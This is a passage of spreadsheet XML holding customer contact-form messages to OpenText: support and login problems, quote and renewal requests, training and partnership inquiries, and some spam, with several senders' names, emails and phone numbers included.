    <t>Do you publish version history or a changelog for the IRM for PDF client?  Specifically looking for when support was added for Windows 10 and Acrobat Reader DC.  Thanks!</t>
  </si>
  <si>
    <t>Looking to work and add value to Opentext contact center solutions in Canada</t>
  </si>
  <si>
    <t>I would like to see a demo of your cloud based electronic filing system. Please have someone reach out to me.</t>
  </si>
  <si>
    <t>We are looking to get a quote on setting up a UPC catalog with Khols- thanks!</t>
  </si>
  <si>
    <t>We have a renewal opportunity, but none of the distribution partners that we use sell your product.  Can you please tell us which distributor to use, or can we sell directly through you?  If so, how do we get set up as a partner?  Thanks...Heath</t>
  </si>
  <si>
    <t xml:space="preserve">I ordered photos from a person that used your services.  However, they stopped being available before the date they were set to expire.  I have been trying to get ahold of them for nearly 2 months to no avail.  Is there anyway you could help me retrieve these pics?  They are from my grand daughters gymnastics.  I tried to include the link but it wont let me.  It is from spaces hightail com._x000D_
_x000D_
Regards,_x000D_
Melissa Koltes_x000D_
</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
The following was the last update on a ticket we opened. No one from professional services got back to me on this, so contacting OT PS from here..Please get back to us on this ASAP..._x000D_
_x000D_
Closed Ticket Notification: OTCS Ticket 4099555 : Continuation of Closed Ticket 4078217_x000D_
_x000D_
Hello Rajender Motlakunta, Your ticket 4099555 has been closed. We hope we've addressed your issue to your satisfaction. Below is some information related to your ticket resolution:Referred to Pro Services. Thank you,OpenText Customer Service Need Help?Check out My Support, your online portal for opening, updating, and tracking support requests.</t>
  </si>
  <si>
    <t xml:space="preserve">At JPM for our Institutional Investment Group we are using Exstream software on the Mainframe to do the composition for our monthly statements.  We also have a licenses version of extream on a LINUX platform generating our Wealth Monthly Statements.  We would like to love off our Mainframe platform and consolidate our Exstream Composition processing onto the LINUX environment.  The current mainframe implementation incorporates VSAM files as both source files and output files from our Exstream composition programs.  My question is does Exstream on LINUX support VSAM file processing or will we have to refactor our current Mainframe process to run on Flat Files before we migrate it to LINUX </t>
  </si>
  <si>
    <t xml:space="preserve">Hello - _x000D_
_x000D_
I am writing to learn what a potential partnership with OpenText would look like? _x000D_
_x000D_
I administer a national network of HR and C-Level leaders in the middle market, focused on promoting a happier, healthier and more productive workplace. _x000D_
_x000D_
We would like to partner to align our audience with your group. </t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for immediate virtual training opportunities for VIM ICC. </t>
  </si>
  <si>
    <t>Need assistance creating a shared datastore.    Recieving error during validation process.</t>
  </si>
  <si>
    <t xml:space="preserve">We have one provider location that we send faxes from EPIC and that they say they are not receiving them.  Rightfax indicates that we are sending and they have completed successfully.  When a resend is done when we have the office on the phone, they receive them to the same exact phone number.  Have you heard of this before?  </t>
  </si>
  <si>
    <t>I am trying to go into 'my support'.  When I sign on, the system tells me that I need to receive a verification email.  I receive it and click on the link.  The screen now says 'email verification sent'.  However, if I click on 'my support' I still get a 'No Access_x000D_
We're sorry, your account does not grant you access to this resource.' message.</t>
  </si>
  <si>
    <t>We purchased a license for Open Text Host Explorer / EXCEED. How can I get help with an emulator question?</t>
  </si>
  <si>
    <t>We can not access the catalogue.  Our password is not working.  Please call as soon as possible.</t>
  </si>
  <si>
    <t xml:space="preserve">I have a pressing need to create a support ticket but upon logging in, I am being asked to validate my email address.  I have tried 3 times but have not yet received the email.  I have tried to change my address but get an error message.  Would you be able to let me know how to proceed? _x000D_
_x000D_
Thanks,_x000D_
Chris_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
We run a Cybersecurity training and services company in Chennai, India and are very interested in becoming an authorized training partner for Encase products since we have a lot of demand for these courses. _x000D_
_x000D_
What would be the next steps for us to get authorized?_x000D_
_x000D_
Thank you </t>
  </si>
  <si>
    <t xml:space="preserve">We need  to change  our   Company Name  Information     to  Epsilon Brokerage Inc. Instead of this :   (Only the company Name everythig else  will remain the same )_x000D_
Ship To: DICEX INTERNATIONAL INC. 12110 SARA RD Laredo TX  78045-1833 USA _x000D_
End User Information: 10479079 DICEX INTERNATIONAL INC. 12110 SARA RD Laredo TX  78045-1833 USA  _x000D_
Customer ID: 10479079 PO Number:_x000D_
Entitlement Group: 10479079_x000D_
</t>
  </si>
  <si>
    <t>Currently using Accelero for fax mass-communications. Interested in shopping for options with greater functionality/flexibility.</t>
  </si>
  <si>
    <t xml:space="preserve">I was trying to register for a course and was having trouble registering.  Your training person called me back to help,she told me the course would be $2250 CAD but when I went to register is was over 4k CAD. why the discrepency? </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I have Hummingbird DM server version 5.1 and I want to ugrade the latest version supported._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Zoheir</t>
  </si>
  <si>
    <t>Hello, I was a coop student in the Summer of 2018, I was wondering if my T4 slip could please be emailed to me as I need it for taxes, my email is calvinmeek97@gmail.com</t>
  </si>
  <si>
    <t>The Navy has an objective to provide more efficient and effective support for Information Technology (IT) programs across the Navy Systems Commands (SYSCOMs). In support of this objective, the Navy Directorate for Information Dominance (OPNAV N2/N6) is consolidating all Tier-1 IT Service Desks and moving from a human-centered Subject Matter Expert (SME)-based business model to a business model using a knowledge-based solution. The Space and Naval Warfare Systems Command (SPAWAR), Program Executive Office Enterprise Information Systems (PEO EIS) PMW 250 Enterprise Systems and Services (E2S) Program Office is managing this consolidation in an initiative called the Navy Enterprise Service Desk (NESD).</t>
  </si>
  <si>
    <t>We have an older version and looking at either updating to current version, or going hosted.  Would like to know more info on both options.</t>
  </si>
  <si>
    <t>I am using an old version of Teleform and would like to price an upgrade for Windows 10.</t>
  </si>
  <si>
    <t>Good evening,_x000D_
Wer'e trying to run a processing job multiple times but it always fails with this status "Job failed: EnCase running the evidence processor unexpectedly terminated"._x000D_
We tried to desinstall EnCase and install the latest version, to empty the cache, to create a new case. Nothing worked._x000D_
The job is running in the local machine, we didn't modified the host._x000D_
What can we do to solve this issue?_x000D_
Regards,_x000D_
Alexandra Morel</t>
  </si>
  <si>
    <t>Hi,_x000D_
We currently have a number of EnCase licenses and NAS licenses. Is it possible to get the NAS script for version 8.07?</t>
  </si>
  <si>
    <t>Need Primary activation code for 3 products of Open Text (Host Explorer , Exceed , Secure Shell)</t>
  </si>
  <si>
    <t>Hi I wish to register myself for the following Training on March 12 2019 at OTEW Vienna _x000D_
V-TR 3-0177a What's New in OpenText Content Server 16 EP5 (Accelerated) - certified included!_x000D_
I don't see the option when I modify my agenda._x000D_
Can you help_x000D_
Kind Regards_x000D_
Shoeb Sarguroh</t>
  </si>
  <si>
    <t xml:space="preserve">Héloïse_x000D_
</t>
  </si>
  <si>
    <t>Hi there,_x000D_
What is the minimum supported version of Open Text Content Server in Windows 2016?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Jawad</t>
  </si>
  <si>
    <t>We are interested in evaluating your product for our forensics team, and I'd like to understand the full capabilities before looking into demo's and POCs.</t>
  </si>
  <si>
    <t>Im getting the following error while deploying by export file on Opentext Streamserve Control Center:_x000D_
StreamServer: Failed to get Repository queue service (0x80000008: not initialized)_x000D_
_x000D_
Grateful if you could please help/assist urgently._x000D_
_x000D_
Thanks and Regards,_x000D_
Rishi</t>
  </si>
  <si>
    <t xml:space="preserve">We have a enterprise license, can you please help me setup my account to be able to download software, what is our information below?_x000D_
_x000D_
Product line* _x000D_
End user number _x000D_
Name of co-worker _x000D_
System ID/serial number/PIN/VPS </t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm interested in online trainings regarding Streamserve like_x000D_
3-3730 OpenText StreamServe Installation and System Administration v5.6.2_x000D_
3-3710 OpenText StreamServe Fundamentals v5.6.2_x000D_
&amp; 3-3713 StreamServe StoryTeller Quickstart v16_x000D_
I saw that there are on-site trainings available, but maybe you have some online courses, materials, documents regarding above areas?_x000D_
Thank you in advance for your help</t>
  </si>
  <si>
    <t xml:space="preserve">we have add a restful web service in empower, the path is /quoteletter/save, we have  put follow definition in customSecurityContext.xml_x000D_
      &lt;intercept-url pattern="/resource/quoteletter" access="permitAll" /&gt;_x000D_
        &lt;intercept-url pattern="/resource/quoteletter/**" access="permitAll" /&gt;_x000D_
but our url http://localhost:9080/mpw/resource/quoteletter/save_x000D_
always say "You do not have permission to access that page."_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
where can I find the installation files of enterprise connect? Can I distribute it among Partners that access our own livelink?_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We would like to find email management solution, could I have eDocs trial version to let us try to use your provided API to integrate our existing software, thanks?_x000D_
_x000D_
Chi</t>
  </si>
  <si>
    <t>I am looking to get an invoice for the renewal for the following license keys:                                              G2002082968, G2002076075, V1223820217U, G2002023101, G2002023102,   G2002028077_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Not able to complete the registration to access the My Support area. I receive the email from open text support, click on confirm registration landing on the open text web site. Trying then to access the My Support site the system keeps on returning the message that the verification is pending.</t>
  </si>
  <si>
    <t>Hi, we are an Infor customer for M3, and need to update Streamserve to version 5.6 build 1210._x000D_
Can you please allow me to download it from patches?_x000D_
Thanks_x000D_
Davide</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team_x000D_
Hope you are doing well. _x000D_
This is in reference to the request received from one of our Customer Aviva. They are interested in the below mentioned solution._x000D_
Hence, I request you to kindly share quotation for the same:_x000D_
Product : OpenText Exstream Live Editor_x000D_
Deployment : UK_x000D_
Billing : SoftwareONE UK  _x000D_
Look forward to your response. _x000D_
Thanks in advance. </t>
  </si>
  <si>
    <t>I am searching a text analytics solution for customer surveys.</t>
  </si>
  <si>
    <t>I need to discuss our account with you urgently.  Please call me at your earliest convenience._x000D_
_x000D_
Many thanks._x000D_
_x000D_
Derek Tedder</t>
  </si>
  <si>
    <t>Hi_x000D_
If we were to utilize InfoArchive in our current EFM solution (I believe Alexander Kenard knows about our solution) - what needs to be done?  Typical questions we have: Is InfoArchive an add-on, is it included on our solution, what about licenses &amp; cost, how to implement etc</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
你能帮我解决一下我的问题吗？_x000D_
</t>
  </si>
  <si>
    <t>I requested a demo of TeamSite on 27 February 2019 and was advised I'd receive a response within 48 hours but nobody responded._x000D_
_x000D_
Can you arrange a demo?_x000D_
_x000D_
Regards_x000D_
_x000D_
Neil</t>
  </si>
  <si>
    <t>My access to support and knowledge areas etc has been revoked, it keeps asking me to send off for an email verification, which I am receiving but my access is not working, please check and restore asap._x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi Are you able to provide me a list of missing security patches for Documentum (I realise we're out of support so i'm not asking for downloads of the patches) so i can conduct a risk assessment?</t>
  </si>
  <si>
    <t>Hi team, would you be please able to quickly help me with the following. I am a contractor for one of our clients that is using your RightFax Software (RightFax Enterprise Fax Manager 10 6 1 20156). Is this still compatible with Exchange 2016 for EWS connector or do they have to upgrade first? Many thanks and looking forward to hearing from you soon.</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
  I am not able to have access to Knowledgebase and Mysupport. Could you please check this_x000D_
and provide me the access to knowledgebase._x000D_
Regards_x000D_
Madhu Pyapali</t>
  </si>
  <si>
    <t>good morning,_x000D_
I received the estimate for the renewal of the support, trying to pay via the link in the email, I return the error No Access "We're sorry," your account does not grant you access to this resource. "_x000D_
I have already proceeded to activate the account via verification email but I can not make the payment._x000D_
How can I pay?_x000D_
Thank you_x000D_
Best Regards_x000D_
Federica Mazzoni</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Do you want more clients and customers?_x000D_
_x000D_
We will help you by placing your website on the 1st page on Google._x000D_
_x000D_
I will be happy to send the "Free Proposal" and "Pricing"._x000D_
_x000D_
Want to know more about my company, costing on SEO, results etc._x000D_
_x000D_
Please email us for full proposal._x000D_
_x000D_
Thank You!_x000D_
Lisa | Whatsapp: +91 9212464161_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Mrs, dear Mr,_x000D_
I have applied for a job in your company at Cork._x000D_
That's could be also a traineeship.  I'm registered at he Actiris international from Bruxelles association which helps me to find a job._x000D_
I will be in Ireland on Monday and Tuesday, next week._x000D_
Could I come to your company to meet you? </t>
  </si>
  <si>
    <t>I am tryin to log a ticket but i am getting an error_x000D_
all the users cant scan eInput erro - Exception in endPageScan</t>
  </si>
  <si>
    <t>I am unable to access the support document as well as knowledge resources. _x000D_
_x000D_
_x000D_
It always give me below message even after confirming emails multiple times now_x000D_
_x000D_
Almost there!_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us.</t>
  </si>
  <si>
    <t>I want to know the rough pricing estimate for the product</t>
  </si>
  <si>
    <t>I would like to ask if there's any free trial for us to try out?</t>
  </si>
  <si>
    <t xml:space="preserve">Respected Industry Leader,_x000D_
_x000D_
We take this privilege to invite your organization to participate in 5th International Police Expo 2019 &amp; 4th India Homeland Security Expo 2019, 1st Drone International Expo – India during 19 - 20 July 2019 at Hall No. 8, 9 &amp; 10, Pragati Maidan, New Delhi, India. It is  India’s one and only exhibition on Army, Police &amp; other forces covering all segments like Defense, Homeland Security, Forensic, Law Enforcement, Drone &amp;UAVs, Armored &amp; Special Purpose Vehicles, Surveillance, Protection, Communication, Fire, Disaster and Rescue Management, Force Wellness and Fitness, Training, Investigation Technology, Traffic &amp; Logistics, Modern equipment, technologies and inputs which are required by police, military , and allied forces for safety and protection of society and all other necessities in day to day and special operations._x000D_
_x000D_
The last edition was well attended by all the major officials from Ministry of Home Affairs, Ministry of Communication &amp; IT and Ministry of Defence India. More than 4000 delegates from Army, Navy, Air Force, Police, Central Armed Police forces, Security organizations &amp; Industry stakeholders attended this two event and lauded it. Since its only exhibition for the Police, Central Armed Forces &amp; Homeland Security, respective stakeholders attended in a larger number with forces representatives and also because of internal and external threats to the nation._x000D_
Should you need any further clarification/information please do let us know._x000D_
_x000D_
Thanks with best regards,_x000D_
--_x000D_
Ashish Gupta_x000D_
Sr. Project Manager_x000D_
Nexgen Exhibitions Pvt. Ltd. (CIN:U93092DL2006PTC152355)_x000D_
1206, Pragati Tower, 26 Rajendra Place_x000D_
New Delhi-110008. INDIA_x000D_
Tel: 91-11-41536990_x000D_
Fax: 91-11-45636990_x000D_
Mob: 91-7533018555_x000D_
Email: ashish@nexgenexhibitions.com, info@internationalpoliceexpo.com_x000D_
</t>
  </si>
  <si>
    <t>Hi, I am trying to get the EnCase Forensic 7.06 Setup - English but after login in opentext its showing sorry u don't have permission to access the same even after confirmation mail clicked.</t>
  </si>
  <si>
    <t>Stop all emails stop</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I have tried to call OpenText's Melbourne Office but the phone seems to be regularly engaged. _x000D_
_x000D_
Could I talk to someone about a possible presentation of the OpenText content services platform? If someone could contact me for context and how we can progress that would be great. _x000D_
_x000D_
I'm reasonably booked up for the next 3 days, so if I am not reachable by phone I will reply to emails/call back when I am back at my desk._x000D_
_x000D_
tom</t>
  </si>
  <si>
    <t>I need to integrate the OpenText Extended ECM to my salesforce org. The company has already purchased the license for it. But due to insufficient resources available on internet I would request you to please guide me in integrating the OpenText Extended ECM to my salesforce org.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like information on how I can become ENCE certified. </t>
  </si>
  <si>
    <t>I am an attorney with Randazza Legal Group, PLLC. We represent MTechnology and Stephen Fairfax, Defendants, in a lawsuit brought by Switch, Ltd. in the U.S. District Court for the District of Nevada. Switch is represented by F. Christopher Austin of Weide &amp; Miller, Ltd. The parties are in need of an electronic discovery provider to perform the imaging of my client's hard drives. Mr. Austin and I are hoping to discuss our needs with someone at OpenText in the next day or two. _x000D_
_x000D_
To the extent that it will assist you in identifying the appropriate office to speak with us, Randazza Legal Group, Weide &amp; Miller, and Switch are based out of Las Vegas, Nevada. MTechnology and Mr. Fairfax are based near Boston, Massachusetts.</t>
  </si>
  <si>
    <t>I am looking for more information on partner/reseller authorizations in regards to bids for the Government of Alberta.</t>
  </si>
  <si>
    <t xml:space="preserve">i just noticed i was charged a subscription for over 5 years that i never a agreed to pay. i was a free program called you send it. if you can see i have never used it for anything. i am seeking for a  full reimbursement for all those years because i did not authorize any payment. i have all ready contacted my bank and they also told me to contact your company to find out more about all these bills for over 5 years. Your company is going to be contacted by my bank soon but the other remanding reimbursement it has to go through your company because its being so long. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I wanted to check, if you would be interested in a list of Cyber Security Industry?_x000D_
_x000D_
Please check below few prospects that you can target Manufacture, Distributor, Partner, Reseller of cyber/information security products and services:_x000D_
_x000D_
We also have the data intelligence of : CEO (Chief Executive officer), CIO (Chief Information Officer), CTO (Chief Technology officer), CSO (Chief Security officer), CISO (Chief Information Security officer), CDO (Chief Digital Officer), Director General &amp; SVP, VP, Director, Head, Sr. Manager, Managers in the fields of : Information Security, Cyber Crime, Cyber Security, Threat management, Critical infrastructure, IT Compliance, Risk &amp; Governance, Information systems audit, Operational risk, IT infrastructure, Operational Technology, IT Architecture, Strategy, IT, Smart services, Digital transformation, Data, R&amp;D, M2M, Applications, e-gov, IoT (Internet of things),Technology, Innovation, AI (Artificial Intelligence), IT Operations and other._x000D_
_x000D_
Industries : Communications/Electronics, Defense, Education, Energy &amp; Natural Resources, Finance, Insurance &amp; Real Estate, Government, Healthcare, Legal, Manufacturing, Media &amp; Broadcasting, Telecom, Transport (Aviation, Road, Railway), Utilities and many more._x000D_
_x000D_
Kindly let me know your target criteria so, that i can provide you more information._x000D_
_x000D_
Target Industry :_x000D_
Target Job Title :_x000D_
Target Geography :_x000D_
_x000D_
Regards,_x000D_
Kiyara James_x000D_
</t>
  </si>
  <si>
    <t>I had a past subscription. I wish to restore my subscription.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I have 2 questions: 1 - I am trying to determine if anyone has setup an online account for a company that has an active GXS Catalog - account umber is 010184397032._x000D_
_x000D_
Secondly, I just made an online account for another company, and am looking to setup a GXS catalog - can you assist?_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Josh</t>
  </si>
  <si>
    <t>How do I get my account adjusted to allow me to submit help desk tickets via your portal?_x000D_
_x000D_
 Account Number:083940-001</t>
  </si>
  <si>
    <t xml:space="preserve">We are exploring the feasibility of building a new business system to enable our Inventory Management Practice utilizing the following trade document set 850 855 860 865 856 810 </t>
  </si>
  <si>
    <t>Quote request for _x000D_
Open Text License Renewal for Maintenance Support; Software License POP 01 APR 2019 to 31 MAR 2020, AND four (4) annual option-periods:_x000D_
    Option Year 1 - 01 APR 2020 to 31 MAR 2021_x000D_
    Option Year 2 - 01 APR 2021 to 31 MAR 2022_x000D_
    Option Year 3 - 01 APR 2022 to 31 MAR 2023_x000D_
    Option Year 4 - 01 APR 2023 to 31 MAR 2024</t>
  </si>
  <si>
    <t>In our application CLE-AS-TRACKWISE our team is unable to run the jobs GeneratePurgeCandidateList, CleanUpPurgeCandidateList, Invalidation and Applications job. The error message that we have received is "System Application must be installed". We then were directed to the folder C:\infoarchive\first-time-setup\applications where we tried to reinstall all applications but that throws a duplicate key error in the command line. So now we are curious of what you guys believe is the issue.</t>
  </si>
  <si>
    <t>LY</t>
  </si>
  <si>
    <t>Catherine Huber is no longer working here.  We need to update our account with my name and email address.  Thank you, Cheri Bergner</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, my name is Mandy Alexander and I am trying to get in contact with someone from the OpenText location at Suite 101, 1st Floor, 155 N Rosemont Blvd, Tucson, AZ 85711. I sent some mail addressed to "Greg Taylor" at Centene Corporation. Google has Centene listed with the same physical address as OpenText. Can someone please give me a call from the OpenText Tucson as I am trying to track down that letter I sent to Greg Taylor? My cell phone number is 309-337-7136. Thank you! ~Mandy Alexander </t>
  </si>
  <si>
    <t>I have an employee who wants to sign up for an online class happening on March 14. We will pay by check. Your website states there are applicable taxes. As a federal contractor, JT4 is tax exempt. Would you please confirm this?</t>
  </si>
  <si>
    <t>I am trying to register for My Support, but I keep receiving the error that I don't have access and another automated confirmation is sent.  I completed the form but then the helpdesk agent said more information was needed and I'm no longer receiving replies on that ticket so I am trying to open another ticket.  I need this access to download our updated EnCase License Key.  Here is my information again:_x000D_
_x000D_
Required Information:_x000D_
First Name: Greg_x000D_
Last Name: Faust_x000D_
Email Address: greg.faust@opic.gov_x000D_
Phone Number: 703-517-8962_x000D_
Company Name: Overseas Private Investment Corporation (OPIC)_x000D_
Product Line: Guidance_x000D_
System ID: X100008004894_x000D_
End UserCode: 10467281_x000D_
coworker: Brent Duckworth</t>
  </si>
  <si>
    <t>interested in the 4 channel analog appliance from OpenText for a legal client</t>
  </si>
  <si>
    <t>On the past, I had access to the EMC site to search in regards to our ApplicationXtender 7, we are updating to 16.3, and I would need to search for documentation about this version. Would you please help to create an account for me?</t>
  </si>
  <si>
    <t>Please stop the fax calls.</t>
  </si>
  <si>
    <t>Information regarding Cloud Solution for Liquid Office.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to sign up to become a developer for EnScript through the guidance software website "become-a-developer"_x000D_
What I really want out of this is the "EnScript Fundamentals, a guide to EnScript written by the training team at Guidance Software"_x000D_
_x000D_
When filling out the form it throws an error because no country is provided. The problem is there is no field to add the country._x000D_
_x000D_
Thanks!_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>I want to create a login account, so I can create support ticket and read the documentation.</t>
  </si>
  <si>
    <t>Hello, I am interested in the pricing for a small company to receive fax2mail services._x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Hello, I am inquiring about holiday hours for OpenText. What are the holiday hours for OpenText?</t>
  </si>
  <si>
    <t xml:space="preserve">Seeking final quotes of the attached product requirements to reach me by tomorrow or latest March 7 ,2019. See attachment._x000D_
Seeking best and final quotes for the following Open Text RightFax maintenance renewal for the term 8/01/2019 to 7/31/2020 _x000D_
_x000D_
 _x000D_
_x000D_
Product Description_x000D_
_x000D_
Manufacturer Part Number (SKU)_x000D_
_x000D_
Qty_x000D_
_x000D_
FAX GATEWAY 2100 MODULAR FAX GATEWAY 1T1/E1 SIP/T.38 - ADVANCED REPLACEMENT SUPPORT_x000D_
_x000D_
Term 8/01/19-7/31/20_x000D_
_x000D_
1000019581_x000D_
_x000D_
1_x000D_
_x000D_
FAX GATEWAY 2100 MODULAR FAX GATEWAY 1T1/E1 SIP/T.38 - ADVANCED REPLACEMENT SUPPORT_x000D_
_x000D_
Term 8/01/19-7/31/20_x000D_
_x000D_
1000019581_x000D_
_x000D_
1_x000D_
_x000D_
FAX SERVER SMTP CONNECTOR FOR MFPS, REDUNDANT EDITION UNITY TELECOM_x000D_
_x000D_
Term 8/01/19-7/31/20_x000D_
_x000D_
1000021575_x000D_
_x000D_
75_x000D_
_x000D_
FAX SERVER SMTP CONNECTOR FOR MFPS, REDUNDANT EDITION_x000D_
_x000D_
Term 8/01/19-7/31/20_x000D_
_x000D_
1000021575_x000D_
_x000D_
75_x000D_
_x000D_
FAX SERVER SMTP CONNECTOR FOR MFPS, REDUNDANT EDITION_x000D_
_x000D_
Term 8/01/19-7/31/20_x000D_
_x000D_
1000021575_x000D_
_x000D_
75_x000D_
_x000D_
Please,call me at the phone number given above if you any questions._x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
I am trying to upload a new file and I keep getting the message "something has gone awry. Please go back to the previous page". Could you please advise? _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I changed my email from bywatson@repsol.com to blair.watson@servexternos.repsol.com and have requested My Support access again.  Even though I received and responded to the confirmation email, I'm still unable to access My Support.</t>
  </si>
  <si>
    <t>Good afternoon. Our agency is interested in knowing more about your digital asset management system. We would like to set up a discovery call and discuss what OpenText has to offer. Thanks in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">I am attempting to activate the ENCE practical EnCase license. According to the installation details I received, I'm supposed to send you the WibuCmRaC file and you would be sending me one back. Do I have this wrong? </t>
  </si>
  <si>
    <t>Hello,_x000D_
I understand we're an Open Text customer.  We have a legacy Solution Manager 7.1 system that we'd like to investigate migrating the document store from SolMan -&gt; Open Text.  Thank you._x000D_
~TJ</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to set up a call with you, myself and my customer at Los Angeles Department of Water and Power today if possible. Can you please contact me at garrmoy@cdwg.com to discuss? </t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
I have some question about your product,_x000D_
1.	I want to know if your product are compatible with mitel?_x000D_
2.	We use sip trunk, and I want to know if Compatible with Bell sip provider?_x000D_
3.	Are you able to use DID to redirect fax to a share mailbox? _x000D_
4.	What is the maximum of line are supported by you product, presently, we have around 45 fax did number via SIP Trunk/phone system Mitel_x000D_
5.	I’t possible to fax via a pc and the multi-Function? How it’s work from the MFC?_x000D_
6.	What is the price for these products?_x000D_
7.	Do you have a demo to try your product?_x000D_
_x000D_
Resume of my environment:_x000D_
Mitel Phone system_x000D_
Mitel mbg_x000D_
Exchange 2013_x000D_
VMware 6.0_x000D_
Sip Trunk_x000D_
+-200 users_x000D_
Citrix _x000D_
_x000D_
Thanks you for your answer_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am not receiving notifications for our orders. We have been experiencing this issue since November. It must be corrected. Please see examples below - _x000D_
_x000D_
ource File Creation:_x000D_
02/27/2019  12:01:00_x000D_
Interchange Control Number:_x000D_
000000614_x000D_
Group Control Number:_x000D_
350_x000D_
Document Control Number:_x000D_
4581_x000D_
Source File Creation:_x000D_
03/01/2019  11:51:00_x000D_
Interchange Control Number:_x000D_
000000616_x000D_
Group Control Number:_x000D_
352_x000D_
Document Control Number:_x000D_
4803_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently running an old version of Teleform (10.7) and need some budget numbers on what it would cost to upgrade to the latest version and, possibly, expand a little on the licensing._x000D_
_x000D_
Setup:_x000D_
1 Reader licenses_x000D_
2 Designer licenses_x000D_
4 Verifier licenses_x000D_
1 scan station licenses_x000D_
1 Automerge license_x000D_
10 Workstation licenses_x000D_
_x000D_
Thanks._x000D_
</t>
  </si>
  <si>
    <t>Sun Life would like to know if Adobe would like to participate in an RFP for our CMS Replacement project. Please contact me via e-mail if interested._x000D_
_x000D_
Thanks, Kathie</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I was wondering whether a forensic analysis of a computer could reveal browsing history on a computer once it has been deleted.</t>
  </si>
  <si>
    <t>Need to set up a call with the customer to discuss Documentum</t>
  </si>
  <si>
    <t>Hi I recently purchased encase forensic v8. I received a dongle sn G3002092392. Where can I get the install files for the software. I have checked your website and cant see anything that related to downloads._x000D_
Regards_x000D_
Eamonn</t>
  </si>
  <si>
    <t>Dear Sirs, I am contacting you in order to gain access to the customer portal. Would it be possible to grant me access. We have a valid license (dongle) and would need to install more recent version of EnCase. Many thanks and best regards, Petr</t>
  </si>
  <si>
    <t xml:space="preserve">Our company ReferralMD is doing an integration with a customer's Rightfax server via the web API, and we're having trouble sending faxes through it. We keep getting the error "Unexpected end of MIME multipart stream. MIME multipart message is not complete." when posting attachments for use in the the fax send job._x000D_
_x000D_
We've tried various configuration settings and changes, but so far found no method to correctly send faxes through, and at this point we're unsure whether it's due to issues in our requests or in the customers Rightfax server._x000D_
_x000D_
Is there any resource that can help us resolve these issue, or find the root cause of the error?_x000D_
_x000D_
Thanks, and best regards_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for a local rightfax partner here in the philippines.  </t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon_x000D_
_x000D_
On Friday I made an enrollment for a consultant on the VIM 7.5 certification but I have not received the invoice. I have done the registration again in case there was a bug but I still do not receive it. Should I download it from somewhere to pay it? What is the period from when you pay until the consultant can take the exam?_x000D_
Thank you._x000D_
_x000D_
Sandra_x000D_
</t>
  </si>
  <si>
    <t>Sent email on Feb 27 to encasetraining@opentext.com requesting the expiration dates for my certs.  NEVER got a response back.  Please respond._x000D_
_x000D_
EnCE– Certification Number: 15-0913-6077_x000D_
CFSR– Certification Number: 19-0634-1018_x000D_
_x000D_
Thank you,_x000D_
Chris</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking into get OpenText Right Fax V16 EP2.  That is the version that has been approved by our IT Service.  </t>
  </si>
  <si>
    <t>Hello,_x000D_
I am a BI developer and I work on OTIC Designer, schceduler, log viewer etc..._x000D_
I have an issue, I don't find any document/guide to use this software (except Help rubric)._x000D_
Do you have any document/user guide in PDF format or other?_x000D_
If yes, can you share them with me (if posible, in french)?_x000D_
_x000D_
Best regards</t>
  </si>
  <si>
    <t>Is there any opportunity for a fresher in OpenText as an Intern.</t>
  </si>
  <si>
    <t>Ever since you became Open Text I have had many issues trying to log on to make changes to our internet fax accounts.  Our Account number is 042467-001.  Can you please send to me the link to make changes.  I have also tried to call numerous times and sent emails - and nobody every responds to me. - I used to log on the easylink with a logon and password and I am never able to find this.  Thank you in advance for helping me out.</t>
  </si>
  <si>
    <t xml:space="preserve">I believe you took over the licensing of the PixTools software we use._x000D_
I need to find out what we have licenced, how to get the latest version and register for support etc etc._x000D_
I believe the contract is RC305647 I emailed Cristian Gheorghe  who told me to raise a ticket with you. </t>
  </si>
  <si>
    <t xml:space="preserve">Looking to Use your Media Management services for all of our clients </t>
  </si>
  <si>
    <t>Hello TEam,_x000D_
My client Department of NAvy wants to procure the following in 1 quantity each. Please have a rep get in touch as this is a last minute inquiry which is due to expire in couple hours._x000D_
QTY 1 - Team Developer Win 32 Maintenance, 1000022525 (S-DG-TEAMDEV-WIN32_M);  _x000D_
  QTY 1 - Team Developer Win 32 Maintenance, 1000022525 (S_DG-TEAMDEV-WIN32_M);_x000D_
  QTY 1 - SQLBase Windows Server Maintenance, 1000022486 (S-DG-SQLB-WIN-SVR_M)._x000D_
_x000D_
Along with 4 option years.</t>
  </si>
  <si>
